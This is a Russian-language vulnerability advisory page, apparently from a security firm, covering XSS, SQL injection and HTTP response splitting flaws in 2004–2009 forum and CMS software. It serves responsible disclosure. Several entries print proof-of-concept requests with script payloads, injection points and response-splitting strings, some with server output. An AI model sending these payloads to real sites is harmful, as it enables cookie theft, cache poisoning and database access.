|
|
Advisory
В этом разделе мы публикуем данные по уязвимостям, обнаруженные нашими специалистами или автоматически найденный интеллектуальными алгоритмами XSpider/MaxPatrol.
Первоначально мы публикуем только общую информацию о наличии уязвимости и отсылаем подробный отчет производителю соответствующего ПО. Если он не ответит на наше сообщение в течение одной-двух недель, то мы оставляем за собой право опубликовать всю имеющуюся информацию независимо от наличия обновления или "заплатки".
PT-2009-12: Межсайтовое выполнение сценариев в UMI.CMS Дата: 04.03.09 Приложение: UMI.CMS Версии 2.x менее 2.7.1 build 10856 Платформа: MS Windows Опасность: Medium Статус производителя Выпущено исправление Подробности Positive Technologies Research Team обнаружила межсайтовое выполнение сценариев в UMI.CMS. Приложение недостаточно осуществляет проверку входных данных в параметре "fields_filter". Злоумышленник может воспользоваться уязвимостью для внедрения и выполнения произвольного HTML кода и кода сценария в браузере пользователя в контексте безопасности уязвимого сайта. Пример:
http://[server]/market/[content_dir]/?fields_filter[price][0]=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&fields_filter[price][1]=1
Последствия Злоумышленник может внедрить произвольный JavaScript, VBScript, ActiveX, HTML или Flash и получить доступ к данным пользователя. Злоумышленник может похитить сессионный куки и получить доступ к учетной записи пользователя. Также существует возможность изменить содержимое страницы, отображаемой пользователю. Решение Установите последнюю версию 2.7.1 build 10856. |
Межсайтовое выполнение сценариев в DotNetNuke Forum Дата: 09.08.05 Приложение: DotNetNuke Forum Платформа: ASP.NET Опасность: Medium Статус производителя Уведомлен. Подробности Публикация отложена.
Последствия Удаленный пользователь может получить доступ к кукам атакуемого пользователя, включая авторизационные. Решение В настоящий момент неизвестно. |
Многочисленные уязвимости в Id Board Дата: 27.07.05 Приложение: Id Board 1.x Платформа: Опасность: High Статус производителя Уведомлен. Подробности Публикация отложена. Последствия 1. Удаленный пользователь может исполнять произвольные SQL-команды применительно к текущей базе данных.
2. Удаленный пользователь может получить доступ к кукам атакуемого пользователя, включая авторизационные. Решение В настоящий момент неизвестно. |
Phorum HTTP Response Splitting Vulnerability Дата: 27.07.05 Приложение: Phorum Платформа: Опасность: Medium Статус производителя Уведомлен. Подробности Публикация отложена. Последствия Удаленный пользователь может получить доступ к “кукам” атакуемого пользователя, включая авторизационные, а также может "отравить" любой промежуточный web-кэш, заменив его содержимое. Решение В настоящий момент неизвестно. |
Phorum " location " HTTP Response Splitting Vulnerability Дата: 22.03.05 Приложение: Phorum 5.0.14a Платформа: PHP Опасность: Medium Статус производителя Уязвимость устранена. Подробности Уязвимости, связанные с контролем вводимых значений, обнаружены в Phorum. Удаленный пользователь может выполнить атаки типа "HTTP Response Splitting". Пример запроса:
http://[server]/phorum5/search.php?forum_id=0&search=1&body=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a<html>Scanned by PTsecurity</html>%0d%0a&author=1&subject=1&match_forum=ALL&match_type=ALL&match_dates=30
Ответ: HTTP/1.1 302 Found Date: Tue, 01 Mar 2005 12:33:53 GMT Server: Apache/1.3.31 (Unix) PHP/4.3.10 X-Powered-By: PHP/4.3.10 Location: http://[server]/phorum5/search.php?0,search=1,page=1,match_type=ALL,match_dates=30,match_forum=ALL,body= Content-Length: 0 HTTP/1.0 200 OK Content-Type: text/html Content-Length: 34 <html>Scanned by PTsecurity</html> ,author=1,subject=1 Connection: close Content-Type: text/html <...> Последствия Удаленный пользователь может получить доступ к “кукам” атакуемого пользователя, включая авторизационные, а также может "отравить" любой промежуточный web-кэш, заменив его содержимое. Решение Установить обновление:
http://phorum.org/story.php?48
http://phorum.org/downloads/phorum-5.0.15a.tar.gz
|
SQL-инъекция в Ikonboard 3.1.x Дата: 16.12.04 Приложение: Ikonboard 3.1.x 3.1.0, 3.1.1, 3.1.2 и 3.1.3. Платформа: Perl Опасность: High Статус производителя Уведомлен. Подробности Публикация отложена. Последствия Удаленный пользователь может исполнять произвольные SQL-команды применительно к текущей базе данных.. Решение В настоящий момент неизвестно. |
SQL-injection в Invision Power Board 2.x Дата: 12.11.04 Приложение: IPB 2.0.0, IPB 2.0.1, IPB 2.0.2 Платформа: PHP Опасность: High Статус производителя Уязвимость устранена. Подробности Уязвимость, связанная с контролем вводимых значений, обнаружена в Invision Power Board v2.x. Удаленный пользователь может провести атаку типа SQL injection. Пример http://site/forum/index.php?act=Post&CODE=02&f=2&t=1&qpid=1[sql_injection] Результат: mySQL query error: select p.*,t.forum_id FROM ibf_posts p LEFT JOIN ibf_topics t ON (t.tid=p.topic_id) WHERE pid IN (1[sql_injection]) mySQL error: You have an error in your SQL syntax near '[sql_injection])' at line 2 mySQL error code: Date: Friday 12th of November 2004 06:53:25 PM Последствия Удаленный пользователь может исполнять произвольные SQL-команды применительно к текущей базе данных. Решение Установить обновление: http://forums.invisionpower.com/index.php?showtopic154916, http://forums.invisionpower.com/index.php?actAttach&typepost&id4992. |
Cross site Scripting и SQL injection в Infuseum ASP Message Board Дата: 09.11.04 Приложение: Infuseum ASP Message Board 2.2.1c Платформа: ASP Опасность: Medium Статус производителя Уведомлен. Подробности Публикация отложена. Последствия Удаленный пользователь может исполнять произвольные SQL-команды применительно к текущей базе данных. Удаленный пользователь может получить доступ к кукам атакуемого пользователя, включая авторизационные. Решение В настоящий момент неизвестно. |
Cross site Scripting и SQL injection в Nucleus v3.1 Дата: 09.11.04 Приложение: Nucleus v.3.1 Платформа: PHP Опасность: Medium Статус производителя Уведомлен. Подробности Публикация отложена. Последствия Удаленный пользователь может исполнять произвольные SQL-команды применительно к текущей базе данных. Удаленный пользователь может получить доступ к кукам атакуемого пользователя, включая авторизационные. Решение В настоящий момент неизвестно. |
SQL-инъекция в AntiBoard v.0.7.3 Дата: 04.11.04 Приложение: AntiBoard v.0.7.3 Платформа: PHP Опасность: Medium Статус производителя Уведомлен. Подробности Публикация отложена. Последствия Удаленный пользователь может исполнять произвольные SQL-команды применительно к текущей базе данных. Решение В настоящий момент неизвестно. |
Множественные SQL-инъекции в Land Down Under v701 Дата: 30.10.04 Приложение: Land Down Under v701 Платформа: PHP Опасность: Medium Статус производителя Уязвимости устранены. Подробности Уязвимости, связанные с контролем вводимых значений, обнаружены в Land Down Under v701. Удаленный пользователь может провести атаку типа SQL injection.  1. SQL-инъекции в GET /users.php?f=1&s=1'[sql code here]&w=asc&d=50 /users.php?f=1&s=name&w=1'[sql code here]&d=50 /users.php?f=1&s=name&w=asc&d=1'[sql code here] /users.php?f=1&s=1'[sql code here]&w=asc /users.php?f=1&s=name&w=1'[sql code here] /comments.php?id=1"[sql code here] 2. SQL-инъекции в POST POST /auth.php?m=register&a=add HTTP/1.1 Host: www.neocrome.net Content-Type: application/x-www-form-urlencoded Content-Length: 123 rusername="[sql code here]&remail=scanner@ptsecurity.com&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1 POST /auth.php?m=register&a=add HTTP/1.1 Host: www.neocrome.net Content-Type: application/x-www-form-urlencoded Content-Length: 102 rusername=1&remail="[sql code here]&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1 3. Раскрытие пути: /plug.php?h=1' Result: <...> <br /> <b>Warning</b>: fopen(system/help/1.txt): failed to open stream: No such file or directory in <b>/home/neocrome/public_html/system/core/plug.inc.php</b> on line <b>266</b><br /> Couldn't find a file : system/help/1.txt <...> POST /auth.php?m=login&a=check HTTP/1.1 Host: www.neocrome.net Content-Type: application/x-www-form-urlencoded Content-Length: 52 PHPSESSID="&rusername=1&rpassword=1&x=1&rcookiettl=1 Result: <...> ion_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in <b>/home/neocrome/public_html/system/common.php</b> on line <b>169</b><br /> <...> Последствия Удаленный пользователь может испольнять произвольные SQL-команды применительно к текущей базе данных. Решение Установить обновление: http://www.neocrome.net/index.php?msingle&id91. |
SQL injection в Phorum Дата: 24.10.04 Приложение: Phorum 5.0.11 Платформа: PHP Опасность: Medium Статус производителя Уязвимость устранена в CVS. Подробности Уязвимость, связанная с контролем вводимых значений, обнаружена в Phorum 5.0.11. Удаленный пользователь может провести атаку типа SQL injection. 1. Пример SQL injection /read.php?1,[SQL CODE HERE],newer Последствия Удаленный пользователь может получить доступ к кукам атакуемого пользователя, включая авторизационные. Удаленный пользователь может исполнять произвольные SQL-команды. Решение Обновить версию с сайта производителя. |
Cross Site Scripting, SQL injection and HTTP Response Splitting в Ideal BB 0.1.5.3 Дата: 11.10.04 Приложение: Ideal BB 0.1.5.3 Платформа: ASP Опасность: High Статус производителя Уведомлен. Подробности Публикация отложена. Последствия Удаленный пользователь может получить доступ к кукам атакуемого пользователя, включая авторизационные.
Удаленный пользователь может "отравить" любой промежуточный web-кэш, заменив его на произвольное содержимое.
Удаленный пользователь может исполнять произвольные SQL-команды. Решение В настоящий момент неизвестно.
|
SQL injection в Natterchat Дата: 09.10.04 Приложение: Natterchat Version 1.12 Final Платформа: ASP Опасность: Low Статус производителя Уведомлен. Подробности Публикация отложена. Последствия Удаленный пользователь может испольнять произвольные SQL-команды применительно к текущей базе данных. Решение В настоящий момент неизвестно. |
Cross Site Scripting в Express-web Content Managment System Дата: 06.10.04 Приложение: Express-web Content Managment System Платформа: ASP Опасность: Low Статус производителя Уязвимость устранена. Подробности Уязвимости, связанные с контролем вводимых значений, обнаружены в Express-web Content Managment System. Удаленный пользователь может провести атаку типа Cross Site Scripting. 1. XSS в get /info/search/default.asp?search=1&n="><Script>alert()</script>&b=1&e=1&a=1&where=1&u=1 /info/search/default.asp?search=1&n=1&b="><Script>alert()</script>&e=1&a=1&where=1&u=1 /info/search/default.asp?search=1&n=1&b=1&e="><Script>alert()</script>&a=1&where=1&u=1 /info/search/default.asp?search=1&n=1&b=1&e=1&a="><Script>alert()</script>&where=1&u=1 2. XSS в referer GET /login.asp HTTP/1.1 Referer: "'><script>XSS CODE HERE</script> 3. XSS в Post POST /feedback/subscribe/default.asp HTTP/1.1 Host: express-web Content-Type: application/x-www-form-urlencoded Content-Length: 51 action=1&email="><Script>alert()</script> Последствия Удаленный пользователь может получить доступ к кукам атакуемого пользователя, включая авторизационные. Решение Обновить ПО на исправленную версию с сайта произоводителя. |
Cross Site Scripting and SQL injection в DevoyBB 1.0.0 Дата: 06.10.04 Приложение: DevoyBB 1.0.0 Forum Платформа: PHP Опасность: Low Статус производителя Уведомлен. Подробности Публикация отложена. Последствия Удаленный пользователь может получить доступ к кукам атакуемого пользователя, включая авторизационные.
Удаленный пользователь может испольнять произвольные SQL-команды применительно к текущей базе данных. Решение В настоящий момент неизвестно. |
Cross Site Scripting and SQL injection в Dmxready Site Chassis Manager Дата: 03.10.04 Приложение: Dmxready Site Chassis Manager Платформа: ASP Опасность: Low Статус производителя Уведомлен. Подробности Публикация отложена. Последствия Удаленный пользователь может получить доступ к кукам атакуемого пользователя, включая авторизационные.
Удаленный пользователь может исполнять произвольные SQL-команды. Решение В настоящий момент неизвестно. |
Cross Site Scripting в CyberStrong eShop ASP Shopping Card v4.6 Дата: 03.10.04 Приложение: CyberStrong eShop Платформа: ASP Опасность: Low Статус производителя Уведомлен. Подробности Публикация отложена. Последствия Удаленный пользователь может получить доступ к кукам атакуемого пользователя, включая авторизационные. Решение В настоящий момент неизвестно. |
Cross Site Scripting в Invision Power Board Дата: 01.10.04 Приложение: Invision Power Board v2.0.0 Платформа: PHP Опасность: Medium Статус производителя Уведомлен. Подробности Уязвимости, связанные с контролем вводимых значений, обнаружены в Invision Power Board. Удаленный пользователь может провести атаку типа Cross Site Scripting. Пример. GET /index.php?s=5875d919a790a7c429c955e4d65b5d54&act=Login&CODE=00 HTTP/1.0 Referer: "'/><script>alert()</script> Результат: <...> nvisionpower.com/index.php?s=7ff7c2ec2bc7f6e349b326dcee4cf41c&act=Login&CODE=01" method="post" name="LOGIN" onsubmit="return ValidateForm()"> <input type="hidden" name="referer" value="\"\'/><script>alert()</script>" /> <div class="borderwrap"> <div class="maintitle"><img src='style_images/1/nav_m.gif' border='0' alt='>' width='8' height='8' /> Log In</div> <div class="formsubtitle">Please enter your details below to log in</div> <div class="errorwrap"> <h4>Attention! <...> Последствия Удаленный пользователь может получить доступ к кукам атакуемого пользователя, включая авторизационные. Решение На данный момент неизвестно. |
Многочисленные уязвимости типа SQL-injection, Cross Site Scripting в WowBB Forum Дата: 01.10.04 Приложение: WowBB forum 1.61 Платформа: PHP Опасность: Medium Статус производителя Уведомлен. Подробности Уязвимости, связанные с контролем вводимых значений, обнаружены в WowBB forum. Удаленный пользователь может провести атаку типа SQL injection, Cross Site Scripting. 1. SQL injection в Get view_user.php?list=1&letter=&sort_by=[SQL CODE HERE] view_user.php?id=1&posts=1&nr=1391&page=[SQL CODE HERE] attachment.php?id=[SQL CODE HERE] 2. SQL injection в Post POST /forum/view_topic.php HTTP/1.1 Host: wowbb Content-Type: application/x-www-form-urlencoded Content-Length: 103 topic_id=1&forum_id='&poll_id=1&poll_vote=1&options[]=1&options[]=1&options[]=1&options[]=1&options[]=1 3. XSS в Get GET /forum/view_user.php?city=Birmingham&country=[XSS CODE HERE] HTTP/1.0 GET /forum/view_user.php?city=Columbus®ion=Ohio&country=[XSS CODE HERE] HTTP/1.0 GET /forum/view_forum.php?id=16&show=[XSS CODE HERE]&sort_by=name HTTP/1.0 GET /forum/view_user.php?list=1&letter=[XSS CODE HERE]&sort_by=name_desc HTTP/1.0 GET /forum/view_topic.php?id=1401&forum_id=1&highlight=[XSS CODE HERE] HTTP/1.0 GET /forum/view_user.php?region=Ohio&country=[XSS CODE HERE] HTTP/1.0 GET /forum/index.php?show=[XSS CODE HERE]&sort_by=name HTTP/1.0 GET /forum/search.php?s=1&q=[XSS CODE HERE]&by_username=1 HTTP/1.0 GET /forum/view_user.php?list=1&letter=[XSS CODE HERE] HTTP/1.0 GET /forum/view_user.php?country=[XSS CODE HERE] 4. XSS в refer GET /admin/admin.php?forum_id=1&delete_forum=1 HTTP/1.0 Referer: "'[XSS CODE HERE] GET /admin/admin.php?category_id=2&cr HTTP/1.0 Referer: "'[XSS CODE HERE] GET /admin/admin.php?resend=1 HTTP/1.0 Referer: "'[XSS CODE HERE] GET /admin/admin.php?create_user_group=1 HTTP/1.0 Referer: "'[XSS CODE HERE] 4. XSS в Post POST /forum/login.php HTTP/1.1 Host: wowbb Content-Type: application/x-www-form-urlencoded Content-Length: 172 register_me=1&user_name=1&user_email=[XSS CODE HERE]&user_password=1&user_retype_password=1&user_homepage=1&user_icq=1&user_aim=1&user_ym=1&user_msnm=1 Последствия Удаленный пользователь может получить доступ к кукам атакуемого пользователя, включая авторизационные.
Удаленный пользователь может исполнять произвольные SQL-команды применительно к текущей базе данных. Решение В настоящий момент неизвестно. |
Уязвимости типа SQL injections, HTTP Response Splitting, XSS в w-Agora Forum Дата: 29.09.04 Приложение: w-Agora forum Платформа: PHP Опасность: Medium Статус производителя Уязвимости исправлены. Подробности Уязвимости, связанные с контролем вводимых значений, обнаружены в w-Agora forum. Удаленный пользователь может провести атаку типа SQL injection, Cross Site Scripting и HTTP Response Splitting. 1. SQL injection http://w-agora/current/redir_url.php?bn=demos_links&key=[SQL CODE HERE] http://w-agora/current/list.php?bn=demos_links&s=&c=[SQL CODE HERE] 2. XSS в GET GET /current/download_thread.php?site=support&bn=support_install&thread=[XSS CODE HERE] GET /current/list.php?bn=support_install&last=19&expnd=[XSS CODE HERE] GET /current/list.php?site=support&bn=support_install&expnd=[XSS CODE HERE] GET /current/list.php?site=demos&bn=demos_links&s=[XSS CODE HERE] GET /current/list.php?bn=demos_links&s=[XSS CODE HERE]&c=ro 3. XSS в POST POST /current/login.php HTTP/1.1 Host: w-agora Content-Type: application/x-www-form-urlencoded Content-Length: 89 loginform=1&redirect_url=1&loginuser=[XSS CODE HERE]&loginpassword=1 POST /current/forgot_password.php HTTP/1.1 Host: w-agora Content-Type: application/x-www-form-urlencoded Content-Length: 48 go=1&userid=[XSS CODE HERE] 4. HTTP Response Splitting http://w-agora/current/subscribe_thread.php?site=support&bn=support_install& thread=%0d%0aContent-Length:%200%0d%0a%0d%0a%20200%20OK%0d%0aContent-Type:%2 0text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eScanned%20by%20PTs ecurity%3c/html%3e%0d%0a http://w-agora/en/support_forums.php?bn=%0d%0aContent-Length:%200%0d%0a%0d%0 a%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a% 0d%0a%3chtml%3eScanned%20by%20PTsecurity%3c/html%3e%0d%0a http://w-agora/fr/support_forums.php?bn=%0d%0aContent-Length:%200%0d%0a%0d%0 a%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a% 0d%0a%3chtml%3eScanned%20by%20PTsecurity%3c/html%3e%0d%0a http://w-agora/en/demos_forums.php?bn=%0d%0aContent-Length:%200%0d%0a%0d%0a% 20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d %0a%3chtml%3eScanned%20by%20PTsecurity%3c/html%3e%0d%0a http://w-agora/fr/demos_forums.php?bn=%0d%0aContent-Length:%200%0d%0a%0d%0a% 20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d %0a%3chtml%3eScanned%20by%20PTsecurity%3c/html%3e%0d%0a 5. Раскрытие реального пути http://www.w-agora/current/list.php?bn=support_install&last=19&collapse=|id| Последствия Удаленный пользователь может получить доступ к кукам атакуемого пользователя, включая авторизационные.
Удаленный пользователь может исполнять произвольные SQL-команды применительно к текущей базе данных.
Удаленный пользователь может "отравить" любой промежуточный web-кэш. Решение Установить новую версию с сайта производителя. |
Многочисленные уязвимости типа SQL-Injection и Cross Site Scripting в AliveSites Forum 2.0 Дата: 29.09.04 Приложение: AliveSites Forum 2.0 Платформа: ASP Опасность: Low Статус производителя Уведомлен. Подробности Уязвимости, связанные с контролем вводимых значений, обнаружены в AliveSites Forum. Удаленный пользователь может провести атаку типа SQL injection, Cross Site Scripting. 1. SQL injection forum.asp?forum_id=[SQL CODE HERE]&forum_title=test 2. XSS post.asp?forum_id=">[XSS CODE HERE]&method=Topic&forum_title=test post.asp?forum_id=33&method=">[XSS CODE HERE]&forum_title=test post.asp?forum_id=33&method=Topic&forum_title=">[XSS CODE HERE] forum.asp?forum_id=33&forum_title=">[XSS CODE HERE] post.asp?id=">[XSS CODE HERE] Последствия Удаленный пользователь может получить доступ к кукам атакуемого пользователя, включая авторизационные.
Удаленный пользователь может исполнять произвольные SQL-команды применительно к текущей базе данных. Решение На данный момент неизвестно. |
Уязвимости типа SQL-Injection и Cross Site Scripting в Gosmart4u Message Board Дата: 29.09.04 Приложение: Gosmart4u Message Board Платформа: ASP Опасность: Low Статус производителя Уведомлен. Подробности Уязвимости, связанные с контролем вводимых значений, обнаружены в Gosmart4u message board. Удаленный пользователь может провести атаку типа SQL injection, Cross Site Scripting. 1. SQL инъекции http://gosmart4u/messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1&Category=1 http://gosmart4u/messageboard/Forum.asp?Username=&Category=[SQL CODE HERE] http://gosmart4u/messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1 http://gosmart4u/messageboard/Forum.asp?Category=[SQL CODE HERE] POST /messageboard/Login_Exec.asp HTTP/1.1 Host: host-name Content-Type: application/x-www-form-urlencoded Content-Length: 29 Username=[SQL CODE HERE]&Password=1&Login=1 POST /messageboard/Login_Exec.asp HTTP/1.1 Host: host-name Content-Type: application/x-www-form-urlencoded Content-Length: 29 Username=1&Password=[SQL CODE HERE]&Login=1 2. XSS http://gosmart4u/messageboard/Forum.asp?QuestionNumber=1&Find=1&Category=[XSS CODE HERE] http://gosmart4u/messageboard/ReplyToQuestion.asp?MainMessageID=[XSS CODE HERE] Последствия Удаленный пользователь может получить доступ к кукам атакуемого пользователя, включая авторизационные. Удаленный пользователь может исполнять произвольные SQL-команды применительно к текущей базе данных. Решение В настоящее время неизвестно. |
Многочисленные уязвимости типа Cross Site Scripting и HTTP Response Splitting в DCP-Portal Дата: 28.08.04 Приложение: DCP-Portal Платформа: PHP Опасность: Low Статус производителя Уведомлен. Подробности Многочисленные уязвимости к XSS и HTTP Response Splitting атакам в DCP-Portal. Уязвимы следующие скрипты: annoucement.php
calendar.php
contents.php
index.php
news.php
register.php
search.php Примеры. 1. XSS /calendar.php?year=[XSS CODE HERE]&month=09&day=01 /calendar.php?year=2004&month=[XSS CODE HERE]&day=01 /calendar.php?year=2004&month=09&day=[XSS CODE HERE] /index.php?page=annoucements&cid=[XSS CODE HERE] /annoucement.php?aid=8&cid=[XSS CODE HERE] /news.php?nid=34&cid=[XSS CODE HERE] /contents.php?cid=[XSS CODE HERE] /index.php?cid=[XSS CODE HERE] 2. XSS в post POST /index.php?page=send_write HTTP/1.1 Host: host name Content-Type: application/x-www-form-urlencoded Content-Length: 91 PHPSESSID=1&yname=1&yadd=1&fname=1&fadd=1&url=[XSS CODE HERE] POST /search.php HTTP/1.1 Host: host name Content-Type: application/x-www-form-urlencoded Content-Length: 59 PHPSESSID=1&q=[XSS CODE HERE]&fields=1 POST /register.php HTTP/1.1 Host: host name Content-Type: application/x-www-form-urlencoded Content-Length: 137 PHPSESSID=1&sex=1&sex=1&name=1&surname=1&email=scanner@ptsecurity.com&addres s=1&zip=1&city=1&country=[XSS CODE HERE] 3. HTTP Response Splitting POST /calendar.php?show=full_month HTTP/1.1 Host: www.dcp-portal.org Content-Type: application/x-www-form-urlencoded Content-Length: 200 PHPSESSID=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aCont ent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eScanned %20by%20PTsecurity%3c/html%3e%0d%0a&s=1&submit=1 Результат: <...> (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a X-Powered-By: PHP/4.3.8 Set-Cookie: PHPSESSID= Content-Length: 0 HTTP/1.0 200 OK Content-Type: text/html Content-Length: 34 <html>Scanned by PTsecurity</html> ; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Transfer-Encoding: chunked Content-Type: text/html <...> Последствия Возможно получить доступ к кукам целевого пользователя, в том числе и к кукам для авторизации. Возможно "отравить" кеш на промежуточном прокси сервере произвольным содержимым. Решение В настоящий момент отсутствует. |
|
 |
|
|
